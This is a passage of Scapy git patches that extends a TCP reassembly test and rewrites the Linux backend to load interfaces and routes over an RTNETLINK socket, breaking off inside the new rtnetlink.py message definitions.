src="2.2.2.2")/TCP(sport=12345, dport=12, seq=5)/"d", ], session=TCPSession) - assert pkts[0][CustomPacket].a == b"abcd" + assert pkts[0][CustomPacket].a == b"abcd", "messed up order 1 failure" # messed up order: fragment 1 arrives not in first position pkts = sniff(offline=[ IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=6)/"e", @@ -545,7 +545,18 @@ with no_debug_dissector(reverse=True): IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=5)/"d", IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=1)/b"\x06a", ], session=TCPSession) - assert pkts[0][CustomPacket].a == b"abcde" + assert pkts[0][CustomPacket].a == b"abcde", "messed up order 2 failure" + # retransmitted packets + pkts = sniff(offline=[ + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=6)/"e", + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=4)/"c", + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=6)/"e", + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=3)/"b", + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=5)/"d", + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=6)/"e", + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=1)/b"\x06a", + ], session=TCPSession) + assert pkts[0][CustomPacket].a == b"abcde", "retransmitted failure" split_layers(TCP, CustomPacket, sport=12345) From cd01ec128466641bad2485c111f4922c0e377f0d Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 28 Apr 2024 20:13:22 +0200 Subject: [PATCH 1267/1632] Rewrite arch/linux (#4352) * Rewrite arch/linux: interfaces/routes loading This rewrites much of the arch/linux code, in order to use a RTNETLINK socket instead of reading /proc/net/XXX. Among those: - the read_routes(6) functions - the linux interfaces provider - arch/linux util functions This adds support for multiple IPv4 addresses to interfaces, among with a generally much better handling of routes. fixes #4201 * Apply guedou suggestions * Restrain routes to RT_TABLE_LOCAL and RT_TABLE_MAIN --- .config/mypy/mypy_check.py | 69 +- .config/mypy/mypy_enabled.txt | 3 +- scapy/arch/__init__.py | 1 - scapy/arch/common.py | 15 +- scapy/arch/{linux.py => linux/__init__.py} | 316 +------ scapy/arch/linux/rtnetlink.py | 940 +++++++++++++++++++++ scapy/arch/windows/__init__.py | 14 +- scapy/fields.py | 2 +- scapy/route.py | 8 +- scapy/utils6.py | 2 + test/linux.uts | 66 +- 11 files changed, 1059 insertions(+), 377 deletions(-) rename scapy/arch/{linux.py => linux/__init__.py} (56%) create mode 100644 scapy/arch/linux/rtnetlink.py diff --git a/.config/mypy/mypy_check.py b/.config/mypy/mypy_check.py index 5db49a4a0c3..371d93c3487 100644 --- a/.config/mypy/mypy_check.py +++ b/.config/mypy/mypy_check.py @@ -63,57 +63,56 @@ "--ignore-missing-imports", # config "--follow-imports=skip", # Remove eventually - "--config-file=" + os.path.abspath( - os.path.join( - localdir, - "mypy.ini" - ) - ), + "--config-file=" + os.path.abspath(os.path.join(localdir, "mypy.ini")), "--show-traceback", -] + ([ - "--platform=" + PLATFORM -] if PLATFORM else []) +] + (["--platform=" + PLATFORM] if PLATFORM else []) if PLATFORM.startswith("linux"): - ARGS.extend([ - "--always-true=LINUX", - "--always-false=OPENBSD", - "--always-false=FREEBSD", - "--always-false=NETBSD", - "--always-false=DARWIN", - "--always-false=WINDOWS", - "--always-false=BSD", - ]) + ARGS.extend( + [ + "--always-true=LINUX", + "--always-false=OPENBSD", + "--always-false=FREEBSD", + "--always-false=NETBSD", + "--always-false=DARWIN", + "--always-false=WINDOWS", + "--always-false=BSD", + ] + ) FILES = [x for x in FILES if not x.startswith("scapy/arch/windows")] elif PLATFORM.startswith("win32"): - ARGS.extend([ - "--always-false=LINUX", - "--always-false=OPENBSD", - "--always-false=FREEBSD", - "--always-false=NETBSD", - "--always-false=DARWIN", - "--always-true=WINDOWS", - "--always-false=WINDOWS_XP", - "--always-false=BSD", - ]) + ARGS.extend( + [ + "--always-false=LINUX", + "--always-false=OPENBSD", + "--always-false=FREEBSD", + "--always-false=NETBSD", + "--always-false=DARWIN", + "--always-true=WINDOWS", + "--always-false=WINDOWS_XP", + "--always-false=BSD", + ] + ) FILES = [ - x for x in FILES if ( - x not in { + x + for x in FILES + if ( + x + not in { # Disabled on Windows - "scapy/arch/linux.py", "scapy/arch/unix.py", "scapy/arch/solaris.py", "scapy/contrib/cansocket_native.py", "scapy/contrib/isotp/isotp_native_socket.py", } - ) and not x.startswith("scapy/arch/bpf") + ) + and not x.startswith("scapy/arch/bpf") + and not x.startswith("scapy/arch/linux") ] else: raise ValueError("Unknown platform") # Run mypy over the files -ARGS += [ - os.path.abspath(f) for f in FILES -] +ARGS += [os.path.abspath(f) for f in FILES] mypy_main(args=ARGS) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index fda3f8e33c9..a5001e3509f 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -16,7 +16,8 @@ scapy/arch/bpf/core.py scapy/arch/bpf/supersocket.py scapy/arch/common.py scapy/arch/libpcap.py -scapy/arch/linux.py +scapy/arch/linux/__init__.py +scapy/arch/linux/rtnetlink.py scapy/arch/solaris.py scapy/arch/unix.py scapy/arch/windows/__init__.py diff --git a/scapy/arch/__init__.py b/scapy/arch/__init__.py index 16eab8ecec7..0a692a6cf46 100644 --- a/scapy/arch/__init__.py +++ b/scapy/arch/__init__.py @@ -125,7 +125,6 @@ def get_if_raw_addr6(iff): # Next step is to import following architecture specific functions: # def attach_filter(s, filter, iface) # def get_if(iff,cmd) -# def get_if_index(iff) # def get_if_raw_addr(iff) # def get_if_raw_hwaddr(iff) # def in6_getifaddr() diff --git a/scapy/arch/common.py b/scapy/arch/common.py index d16d5dea104..95d192bf983 100644 --- a/scapy/arch/common.py +++ b/scapy/arch/common.py @@ -7,12 +7,15 @@ Functions common to different architectures """ +import socket import ctypes + from scapy.config import conf from scapy.data import MTU, ARPHDR_ETHER, ARPHRD_TO_DLT from scapy.error import Scapy_Exception -from scapy.interfaces import network_name +from scapy.interfaces import network_name, resolve_iface, NetworkInterface from scapy.libs.structures import bpf_program +from scapy.pton_ntop import inet_pton from scapy.utils import decode_locale_str # Type imports @@ -33,7 +36,6 @@ "RUNNING", "NOARP", "PROMISC", - "NOTRAILERS", "ALLMULTI", "MASTER", "SLAVE", @@ -47,6 +49,15 @@ ] +def get_if_raw_addr(iff): + # type: (Union[NetworkInterface, str]) -> bytes + """Return the raw IPv4 address of interface""" + iff = resolve_iface(iff) + if not iff.ip: + return b"\x00" * 4 + return inet_pton(socket.AF_INET, iff.ip) + + # BPF HANDLERS diff --git a/scapy/arch/linux.py b/scapy/arch/linux/__init__.py similarity index 56% rename from scapy/arch/linux.py rename to scapy/arch/linux/__init__.py index 566916ff2ad..d08d1bcc026 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux/__init__.py @@ -11,9 +11,7 @@ from fcntl import ioctl from select import select -import array import ctypes -import itertools import os import socket import struct @@ -21,22 +19,18 @@ import sys import time -import scapy.utils -import scapy.utils6 -from scapy.compat import raw, plain_str +from scapy.compat import raw from scapy.consts import LINUX from scapy.arch.common import ( - _iff_flags, compile_filter, ) -from scapy.arch.unix import get_if, get_if_raw_hwaddr +from scapy.arch.unix import get_if from scapy.config import conf from scapy.data import MTU, ETH_P_ALL, SOL_PACKET, SO_ATTACH_FILTER, \ SO_TIMESTAMPNS from scapy.error import ( ScapyInvalidPlatformException, Scapy_Exception, - log_loading, log_runtime, warning, ) @@ -48,18 +42,23 @@ ) from scapy.libs.structures import sock_fprog from scapy.packet import Packet, Padding -from scapy.pton_ntop import inet_ntop from scapy.supersocket import SuperSocket # re-export -from scapy.arch.unix import read_nameservers # noqa: F401 +from scapy.arch.common import get_if_raw_addr # noqa: F401 +from scapy.arch.unix import read_nameservers, get_if_raw_hwaddr # noqa: F401 +from scapy.arch.linux.rtnetlink import ( # noqa: F401 + read_routes, + read_routes6, + in6_getifaddr, + _get_if_list, +) # Typing imports from typing import ( Any, Callable, Dict, - List, NoReturn, Optional, Tuple, @@ -118,34 +117,8 @@ PACKET_FASTROUTE = 6 # Fastrouted frame # Unused, PACKET_FASTROUTE and PACKET_LOOPBACK are invisible to user space -# Utils - - -def get_if_raw_addr(iff): - # type: (_GlobInterfaceType) -> bytes - r""" - Return the raw IPv4 address of an interface. - If unavailable, returns b"\0\0\0\0" - """ - try: - return get_if(iff, SIOCGIFADDR)[20:24] - except IOError: - return b"\0\0\0\0" - - -def _get_if_list(): - # type: () -> List[str] - """ - Function to read the interfaces from /proc/net/dev - """ - try: - with open("/proc/net/dev", "r", errors='replace') as f: - return [line.split(':', 1)[0].strip() - for line in itertools.islice(f, 2, None)] - except IOError: - log_loading.critical("Can't open /proc/net/dev !") - return [] +# Utils def attach_filter(sock, bpf_filter, iface): # type: (socket.socket, str, _GlobInterfaceType) -> None @@ -179,239 +152,14 @@ def set_promisc(s, iff, val=1): s.setsockopt(SOL_PACKET, cmd, mreq) -def get_alias_address(iface_name, # type: str - ip_mask, # type: int - gw_str, # type: str - metric # type: int - ): - # type: (...) -> Optional[Tuple[int, int, str, str, str, int]] - """ - Get the correct source IP address of an interface alias - """ - - # Detect the architecture - if scapy.consts.IS_64BITS: - offset, name_len = 16, 40 - else: - offset, name_len = 32, 32 - - # Retrieve interfaces structures - sck = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - names_ar = array.array('B', b'\0' * 4096) - ifreq = ioctl(sck.fileno(), SIOCGIFCONF, - struct.pack("iL", len(names_ar), names_ar.buffer_info()[0])) - - # Extract interfaces names - out = struct.unpack("iL", ifreq)[0] - names_b = names_ar.tobytes() - names = [names_b[i:i + offset].split(b'\0', 1)[0] for i in range(0, out, name_len)] # noqa: E501 - - # Look for the IP address - for ifname_b in names: - ifname = plain_str(ifname_b) - # Only look for a matching interface name - if not ifname.startswith(iface_name): - continue - - # Retrieve and convert addresses - ifreq = ioctl(sck, SIOCGIFADDR, struct.pack("16s16x", ifname_b)) - ifaddr = struct.unpack(">I", ifreq[20:24])[0] # type: int - ifreq = ioctl(sck, SIOCGIFNETMASK, struct.pack("16s16x", ifname_b)) - msk = struct.unpack(">I", ifreq[20:24])[0] # type: int - - # Get the full interface name - if ':' in ifname: - ifname = ifname[:ifname.index(':')] - else: - continue - - # Check if the source address is included in the network - if (ifaddr & msk) == ip_mask: - sck.close() - return (ifaddr & msk, msk, gw_str, ifname, - scapy.utils.ltoa(ifaddr), metric) - - sck.close() - return None - - -def read_routes(): - # type: () -> List[Tuple[int, int, str, str, str, int]] - """ - Read routes from /proc/net/route - """ - try: - with open("/proc/net/route", "r", errors="replace") as f, \ - socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s: - routes = [] - # Loopback route - try: - ifreq = ioctl(s, SIOCGIFADDR, - struct.pack("16s16x", conf.loopback_name.encode("utf8"))) - addrfamily = struct.unpack("h", ifreq[16:18])[0] - if addrfamily == socket.AF_INET: - ifreq2 = ioctl( - s, SIOCGIFNETMASK, - struct.pack("16s16x", conf.loopback_name.encode("utf8")) - ) - msk = socket.ntohl(struct.unpack("I", ifreq2[20:24])[0]) - dst = socket.ntohl(struct.unpack("I", ifreq[20:24])[0]) & msk - ifaddr = scapy.utils.inet_ntoa(ifreq[20:24]) - routes.append((dst, msk, "0.0.0.0", conf.loopback_name, - ifaddr, 1)) - else: - warning("Interface %s: unknown address family (%i)" % ( - conf.loopback_name, addrfamily - )) - except IOError as err: - if err.errno == 99: - warning("Interface %s: no address assigned" % conf.loopback_name) - else: - warning("Interface %s: failed to get address config (%s)" % ( - conf.loopback_name, str(err)) - ) - - # Load routes - for line in (x.split() for x in itertools.islice(f, 1, None)): - # line = iff, dst, gw, flags, _, _, metric, msk, _, _, _ - iff, gw = line[0], line[2] - dst, flags, msk = tuple( - int(x, 16) for x in [line[1], line[3], line[7]] - ) - metric = int(line[6]) - # Check iface flags - if flags & RTF_UP == 0: - continue - if flags & RTF_REJECT: - continue - try: - ifreq = ioctl(s, SIOCGIFADDR, - struct.pack("16s16x", iff.encode("utf8"))) - except IOError: - # interface is present in routing tables but does not - # have any assigned IP - ifaddr = "0.0.0.0" - ifaddr_int = 0 - else: - addrfamily = struct.unpack("h", ifreq[16:18])[0] - if addrfamily == socket.AF_INET: - ifaddr = scapy.utils.inet_ntoa(ifreq[20:24]) - ifaddr_int = struct.unpack("!I", ifreq[20:24])[0] - else: - warning("Interface %s: unknown address family (%i)", iff, addrfamily) # noqa: E501 - continue - - # Attempt to detect an interface alias based on addresses - # inconsistencies - dst = socket.htonl(dst) & 0xffffffff - msk = socket.htonl(msk) & 0xffffffff - gw = scapy.utils.inet_ntoa(struct.pack("I", int(gw, 16))) - - route = (dst, msk, gw, iff, ifaddr, metric) - if ifaddr_int & msk != dst: - tmp_route = get_alias_address(iff, dst, gw, metric) - if tmp_route: - route = tmp_route - routes.append(route) - - return routes - - except IOError: - log_loading.critical("Can't open /proc/net/route !") - return [] - -############ -# IPv6 # -############ - - -def in6_getifaddr(): - # type: () -> List[Tuple[str, int, str]] - """ - Returns a list of 3-tuples of the form (addr, scope, iface) where - 'addr' is the address of scope 'scope' associated to the interface - 'iface'. - - This is the list of all addresses of all interfaces available on - the system. - """ - try: - with open("/proc/net/if_inet6", "r", errors='replace') as f: - ret = [] # type: List[Tuple[str, int, str]] - for addr, _, _, scope, _, ifname in (x.split() for x in f): - addr = scapy.utils6.in6_ptop( - b':'.join( - struct.unpack('4s4s4s4s4s4s4s4s', addr.encode()) - ).decode() - ) - # (addr, scope, iface) - ret.append((addr, int(scope, 16), ifname)) - return ret - except IOError: - return [] - - -def read_routes6(): - # type: () -> List[Tuple[str, int, str, str, List[str], int]] - """ - Read routes from /proc/net/ipv6_route - """ - - # 1. destination network - # 2. destination prefix length - # 3. source network displayed - # 4. source prefix length - # 5. next hop - # 6. metric - # 7. reference counter (?!?) - # 8. use counter (?!?) - # 9. flags - # 10. device name - - def proc2r(p): - # type: (str) -> str - ret = struct.unpack('4s4s4s4s4s4s4s4s', p.encode()) - addr = b':'.join(ret).decode() - return scapy.utils6.in6_ptop(addr) - - try: - with open("/proc/net/ipv6_route", "r", errors='replace') as f: - routes = [] - lifaddr = in6_getifaddr() - for line in (x.split() for x in itertools.islice(f, 1, None)): - # line = d, dp, _, _, nh, metric, _, _, fl, dev - d, nh, dev = line[0], line[4], line[9] - dp, metric, flags = [int(x, 16) for x in [line[1], line[5], line[8]]] - - if flags & RTF_UP == 0: - continue - if flags & RTF_REJECT: - continue - - d = proc2r(d) - nh = proc2r(nh) - - cset = [] # candidate set (possible source addresses) - if dev == conf.loopback_name: - if d == '::': - continue - cset = ['::1'] - else: - devaddrs = (x for x in lifaddr if x[2] == dev) - cset = scapy.utils6.construct_source_candidate_set(d, dp, devaddrs) - - if len(cset) != 0: - routes.append((d, dp, nh, dev, cset, metric)) - return routes - except IOError: - return [] - - def get_if_index(iff): # type: (_GlobInterfaceType) -> int return int(struct.unpack("I", get_if(iff, SIOCGIFINDEX)[16:20])[0]) +# Interface provider + + class LinuxInterfaceProvider(InterfaceProvider): name = "sys" @@ -421,35 +169,15 @@ def _is_valid(self, dev): def load(self): # type: () -> Dict[str, NetworkInterface] - from scapy.fields import FlagValue data = {} - ips = in6_getifaddr() - for i in _get_if_list(): - try: - ifflags = struct.unpack("16xH14x", get_if(i, SIOCGIFFLAGS))[0] - index = get_if_index(i) - mac = scapy.utils.str2mac( - get_if_raw_hwaddr(i, siocgifhwaddr=SIOCGIFHWADDR)[1] - ) - ip = None # type: Optional[str] - ip = inet_ntop(socket.AF_INET, get_if_raw_addr(i)) - except IOError: - warning("Interface %s does not exist!", i) - continue - if ip == "0.0.0.0": - ip = None - ifflags = FlagValue(ifflags, _iff_flags) - if_data = { - "name": i, - "network_name": i, - "description": i, - "flags": ifflags, - "index": index, - "ip": ip, - "ips": [x[0] for x in ips if x[2] == i] + [ip] if ip else [], - "mac": mac - } - data[i] = NetworkInterface(self, if_data) + for iface in _get_if_list().values(): + if_data = iface.copy() + if_data.update({ + "network_name": iface["name"], + "description": iface["name"], + "ips": [x["address"] for x in iface["ips"]] + }) + data[iface["name"]] = NetworkInterface(self, if_data) return data diff --git a/scapy/arch/linux/rtnetlink.py b/scapy/arch/linux/rtnetlink.py new file mode 100644 index 00000000000..aea39c3747b --- /dev/null +++ b/scapy/arch/linux/rtnetlink.py @@ -0,0 +1,940 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +This file implements the rtnetlink API that is used to read the network +configuration of the machine. +""" + +import socket +import struct +import time + +import scapy.utils6 + +from scapy.consts import BIG_ENDIAN +from scapy.config import conf +from scapy.error import log_loading +from scapy.packet import ( + Packet, + bind_layers, +) +from scapy.utils import atol, itom + +from scapy.fields import ( + ByteEnumField, + ByteField, + EnumField, + Field, + FieldLenField, + FlagsField, + IP6Field, + IPField, + LenField, + MACField, + MayEnd, + MultipleTypeField, + PacketListField, + PadField, + StrLenField, + XStrLenField, +) + +from scapy.arch.common import _iff_flags + +# Typing imports +from typing import ( + Any, + Dict, + List, + Optional, + Tuple, + Type, +) + +# from and + + +# Common header + + +class rtmsghdr(Packet): + fields_desc = [ + LenField("nlmsg_len", None, fmt="=L"), + EnumField( + "nlmsg_type", + 0, + { + # netlink.h + 3: "NLMSG_DONE", + # rtnetlink.h + 16: "RTM_NEWLINK", + 17: "RTM_DELLINK", + 18: "RTM_GETLINK", + 19: "RTM_SETLINK", + 20: "RTM_NEWADDR", + 21: "RTM_DELADDR", + 22: "RTM_GETADDR", + # 23: unused + 24: "RTM_NEWROUTE", + 25: "RTM_DELROUTE", + 26: "RTM_GETROUTE", + # 27: unused + }, + fmt="=H", + ), + FlagsField( + "nlmsg_flags", + 0, + 16 if BIG_ENDIAN else -16, + { + 0x01: "NLM_F_REQUEST", + 0x02: "NLM_F_MULTI", + 0x04: "NLM_F_ACK", + 0x08: "NLM_F_ECHO", + 0x10: "NLM_F_DUMP_INTR", + 0x20: "NLM_F_DUMP_FILTERED", + # GET modifiers + 0x100: "NLM_F_ROOT", + 0x200: "NLM_F_MATCH", + 0x400: "NLM_F_ATOMIC", + }, + ), + Field("nlmsg_seq", 0, fmt="=L"), + Field("nlmsg_pid", 0, fmt="=L"), + ] + + def post_build(self, pkt: bytes, pay: bytes) -> bytes: + pkt += pay + if self.nlmsg_len is None: + pkt = struct.pack("=L", len(pkt)) + pkt[4:] + return pkt + + def extract_padding(self, s: bytes) -> Tuple[bytes, Optional[bytes]]: + return s[: self.nlmsg_len - 16], s[self.nlmsg_len - 16 :] + + def answers(self, other: Packet) -> bool: + return bool(other.nlmsg_seq == self.nlmsg_seq) + + +# DONE + + +class nlmsgerr_rtattr(Packet): + fields_desc = [ + FieldLenField( + "rta_len", None, length_of="rta_data", fmt="=H", adjust=lambda _, x: x + 4 + ), + EnumField( + "rta_type", + 0, + {}, + fmt="=H", + ), + PadField( + MultipleTypeField( + [], + StrLenField( + "rta_data", + b"", + length_from=lambda pkt: pkt.rta_len - 4, + ), + ), + align=4, + ), + ] + + def default_payload_class(self, payload: bytes) -> Type[Packet]: + return conf.padding_layer + + +class nlmsgerr(Packet): + fields_desc = [ + MayEnd(Field("status", 0, fmt="=L")), + # Pay + PacketListField("data", [], nlmsgerr_rtattr), + ] + + +bind_layers(rtmsghdr, nlmsgerr, nlmsg_type=3) + + +# LINK messages + + +class ifla_af_spec_inet_rtattr(Packet): + fields_desc = [ + FieldLenField( + "rta_len", None, length_of="rta_data", fmt="=H", adjust=lambda _, x: x + 4 + ), + EnumField( + "rta_type", + 0, + { + 0x00: "IFLA_INET_UNSPEC", + 0x01: "IFLA_INET_CONF", + }, + fmt="=H", + ), + PadField( + MultipleTypeField( + [], + XStrLenField( + "rta_data", + b"", + length_from=lambda pkt: pkt.rta_len - 4, + ), + ), + align=4, + ), + ] + + def default_payload_class(self, payload: bytes) -> Type[Packet]: + return conf.padding_layer + + +class ifla_af_spec_inet6_rtattr(Packet): + fields_desc = [ + FieldLenField( + "rta_len", None, length_of="rta_data", fmt="=H", adjust=lambda _, x: x + 4 + ), + EnumField( + "rta_type", + 0, + { + 0x00: "IFLA_INET6_UNSPEC", + 0x01: "IFLA_INET6_FLAGS", + 0x02: "IFLA_INET6_CONF", + 0x03: "IFLA_INET6_STATS", + 0x04: "IFLA_INET6_MCAST", + 0x05: "IFLA_INET6_CACHEINFO", + 0x06: "IFLA_INET6_ICMP6STATS", + 0x07: "IFLA_INET6_TOKEN", + 0x08: "IFLA_INET6_ADDR_GEN_MODE", + 0x09: "IFLA_INET6_RA_MTU", + }, + fmt="=H", + ), + PadField( + MultipleTypeField( + [], + XStrLenField( + "rta_data", + b"", + length_from=lambda pkt: pkt.rta_len - 4, + ), + ), + align=4, + ), + ] + + def default_payload_class(self, payload: bytes) -> Type[Packet]: + return conf.padding_layer + + +class ifla_af_spec_rtattr(Packet): + fields_desc = [ + FieldLenField( + "rta_len", None, length_of="rta_data", fmt="=H", adjust=lambda _, x: x + 4 + ), + EnumField("rta_type", 0, socket.AddressFamily, fmt="=H"), + PadField( + MultipleTypeField( + [ + ( + # AF_INET + PacketListField( + "rta_data", + [], + ifla_af_spec_inet_rtattr, + length_from=lambda pkt: pkt.rta_len - 4, + ), + lambda pkt: pkt.rta_type == 2, + ), + ( + # AF_INET6 + PacketListField( + "rta_data", + [], + ifla_af_spec_inet6_rtattr, + length_from=lambda pkt: pkt.rta_len - 4, + ), + lambda pkt: pkt.rta_type == 10, + ), + ], + XStrLenField( + "rta_data", + b"", + length_from=lambda pkt: pkt.rta_len - 4, + ), + ), + align=4, + ), + ] + + def default_payload_class(self, payload: bytes) -> Type[Packet]: + return conf.padding_layer + + +class ifinfomsg_rtattr(Packet): + fields_desc = [ + FieldLenField( + "rta_len", None, length_of="rta_data", fmt="=H", adjust=lambda _, x: x + 4 + ), + EnumField( + "rta_type", + 0, + { + 0x00: "IFLA_UNSPEC", + 0x01: "IFLA_ADDRESS", + 0x02: "IFLA_BROADCAST", + 0x03: "IFLA_IFNAME", + 0x04: "IFLA_MTU", + 0x05: "IFLA_LINK", + 0x06: "IFLA_QDISC", + 0x07: "IFLA_STATS", + 0x08: "IFLA_COST", + 0x09: "IFLA_PRIORITY", + 0x0A: "IFLA_MASTER", + 0x0B: "IFLA_WIRELESS", + 0x0C: "IFLA_PROTINFO", + 0x0D: "IFLA_TXQLEN", + 0x0E: "IFLA_MAP", + 0x0F: "IFLA_WEIGHT", + 0x10: "IFLA_OPERSTATE", + 0x11: "IFLA_LINKMODE", + 0x12: "IFLA_LINKINFO", + 0x13: "IFLA_NET_NS_PID", + 0x14: "IFLA_IFALIAS", + 0x15: "IFLA_NUM_VS", + 0x16: "IFLA_VFINFO_LIST", + 0x17: "IFLA_STATS64", + 0x18: "IFLA_VF_PORTS", + 0x19: "IFLA_PORT_SELF", + 0x1A: "IFLA_AF_SPEC", + 0x1B: "IFLA_GROUP", + 0x1C: "IFLA_NET_NS_FD", + 0x1D: "IFLA_EXT_MASK", + 0x1E: "IFLA_PROMISCUITY", + 0x1F: "IFLA_NUM_TX_QUEUES", + 0x20: "IFLA_NUM_RX_QUEUES", + 0x21: "IFLA_CARRIER", + 0x22: "IFLA_PHYS_PORT_ID", + 0x23: "IFLA_CARRIER_CHANGES", + 0x24: "IFLA_PHYS_SWITCH_ID", + 0x25: "IFLA_LINK_NETNSID", + 0x26: "IFLA_PHYS_PORT_NAME", + 0x27: "IFLA_PROTO_DOWN", + 0x28: "IFLA_GSO_MAX_SEGS", + 0x29: "IFLA_GSO_MAX_SIZE", + 0x2A: "IFLA_PAD", + 0x2B: "IFLA_XDP", + 0x2C: "IFLA_EVENT", + 0x2D: "IFLA_NEW_NETNSID", + 0x2E: "IFLA_IF_NETNSID", + 0x2F: "IFLA_CARRIER_UP_COUNT", + 0x30: "IFLA_CARRIER_DOWN_COUNT", + 0x31: "IFLA_NEW_IFINDEX", + 0x32: "IFLA_MIN_MTU", + 0x33: "IFLA_MAX_MTU", + 0x34: "IFLA_PROP_LIST", + 0x35: "IFLA_ALT_IFNAME", + 0x36: "IFLA_PERM_ADDRESS", + 0x37: "IFLA_PROTO_DOWN_REASON", + 0x38: "IFLA_PARENT_DEV_NAME", + 0x39: "IFLA_PARENT_DEV_BUS_NAME", + 0x3A: "IFLA_GRO_MAX_SIZE", + 0x3B: "IFLA_TSO_MAX_SIZE", + 0x3C: "IFLA_TSO_MAX_SEGS", + 0x3D: "IFLA_ALLMULTI", + }, + fmt="=H", + ), + PadField( + MultipleTypeField( + [ + ( + # IFLA_ADDRESS + MACField("rta_data", "00:00:00:00:00:00"), + lambda pkt: pkt.rta_type in [0x01, 0x36], + ), + ( + # IFLA_IFNAME + StrLenField( + "rta_data", b"", length_from=lambda pkt: pkt.rta_len - 4 + ), + lambda pkt: pkt.rta_type in [0x03], + ), + ( + # IFLA_AF_SPEC + PacketListField( + "rta_data", + [], + ifla_af_spec_rtattr, + length_from=lambda pkt: pkt.rta_len - 4, + ), + lambda pkt: pkt.rta_type == 0x1A, + ), + ], + XStrLenField( + "rta_data", + b"", + length_from=lambda pkt: pkt.rta_len - 4, + ), + ), + align=4, + ), + ] + + def default_payload_class(self, payload: bytes) -> Type[Packet]: + return conf.padding_layer + + +class ifinfomsg(Packet): + fields_desc = [ + ByteEnumField("ifi_family", 0, socket.AddressFamily), # type: ignore + ByteField("res", 0), + Field("ifi_type", 0, fmt="=H"), + Field("ifi_index", 0, fmt="=i"), + FlagsField( + "ifi_flags", + 0, + 32 if BIG_ENDIAN else -32, + _iff_flags, + ), + Field("ifi_change", 0, fmt="=I"), + # Pay + PacketListField("data", [], ifinfomsg_rtattr), + ] + + +bind_layers(rtmsghdr, ifinfomsg, nlmsg_type=16) +bind_layers(rtmsghdr, ifinfomsg, nlmsg_type=17) +bind_layers(rtmsghdr, ifinfomsg, nlmsg_type=18) +bind_layers(rtmsghdr, ifinfomsg, nlmsg_type=19) + + +# ADDR messages + + +class ifaddrmsg_rtattr(Packet): + fields_desc = [ + FieldLenField( + "rta_len", None, length_of="rta_data", fmt="=H", adjust=lambda _, x: x + 4 + ), + EnumField( + "rta_type", + 0, + { + 0x00: "IFA_UNSPEC", + 0x01: "IFA_ADDRESS", + 0x02: "IFA_LOCAL", + 0x03: "IFA_LABEL", + 0x04: "IFA_BROADCAST", + 0x05: "IFA_ANYCAST", + 0x06: "IFA_CACHEINFO", + 0x07: "IFA_MULTICAST", + 0x08: "IFA_FLAGS", + 0x09: "IFA_RT_PRIORITY", + 0x0A: "IFA_TARGET_NETNSID", + 0x0B: "IFA_PROTO", + }, + fmt="=H", + ), + PadField( + MultipleTypeField( + [ + # IFA_ADDRESS, IFA_LOCAL, IFA_BROADCAST + ( + IPField("rta_data", "0.0.0.0"), + lambda pkt: pkt.parent + and pkt.parent.ifa_family == 2 + and pkt.rta_type in [0x01, 0x02, 0x04], + ), + ( + IP6Field("rta_data", "::"), + lambda pkt: pkt.parent + and pkt.parent.ifa_family == 10 + and pkt.rta_type in [0x01, 0x02, 0x04], + ), + ( + # IFA_LABEL + StrLenField( + "rta_data", b"", length_from=lambda pkt: pkt.rta_len - 4 + ), + lambda pkt: pkt.rta_type in [0x03], + ), + ], + XStrLenField( + "rta_data", + b"", + length_from=lambda pkt: pkt.rta_len - 4, + ), + ), + align=4, + ), + ] + + def default_payload_class(self, payload: bytes) -> Type[Packet]: + return conf.padding_layer + + +class ifaddrmsg(Packet): + fields_desc = [ + ByteEnumField("ifa_family", 0, socket.AddressFamily), # type: ignore + ByteField("ifa_prefixlen", 0), + FlagsField( + "ifa_flags", + 0, + -8, + { + 0x01: "IFA_F_SECONDARY", + 0x02: "IFA_F_NODAD", + 0x04: "IFA_F_OPTIMISTIC", + 0x08: "IFA_F_DADFAILED", + 0x10: "IFA_F_HOMEADDRESS", + 0x20: "IFA_F_DEPRECATED", + 0x40: "IFA_F_TENTATIVE", + 0x80: "IFA_F_PERMANENT", + }, + ), + ByteField("ifa_scope", 0), + Field("ifa_index", 0, fmt="=L"), + # Pay + PacketListField("data", [], ifaddrmsg_rtattr), + ] + + +bind_layers(rtmsghdr, ifaddrmsg, nlmsg_type=20) +bind_layers(rtmsghdr, ifaddrmsg, nlmsg_type=21) +bind_layers(rtmsghdr, ifaddrmsg, nlmsg_type=22) + + +# ROUTE messages + + +RT_CLASS = { + 0: "RT_TABLE_UNSPEC", + 252: "RT_TABLE_COMPAT", + 253: "RT_TABLE_DEFAULT", + 254: "RT_TABLE_MAIN", + 255: "RT_TABLE_LOCAL", +} + + +class rtmsg_rtattr(Packet): + fields_desc = [ + FieldLenField( + "rta_len", None, length_of="rta_data", fmt="=H", adjust=lambda _, x: x + 4 + ), + EnumField( + "rta_type", + 0, + { + 0x00: "RTA_UNSPEC", + 0x01: "RTA_DST", + 0x02: "RTS_SRC", + 0x03: "RTS_IIF", + 0x04: "RTS_OIF", + 0x05: "RTA_GATEWAY", + 0x06: "RTA_PRIORITY", + 0x07: "RTA_PREFSRC", + 0x08: "RTA_METRICS", + 0x09: "RTA_MULTIPATH", + 0x0B: "RTA_FLOW", + 0x0C: "RTA_CACHEINFO", + 0x0F: "RTA_TABLE", + 0x10: "RTA_MARK", + 0x11: "RTA_MFC_STATS", + 0x12: 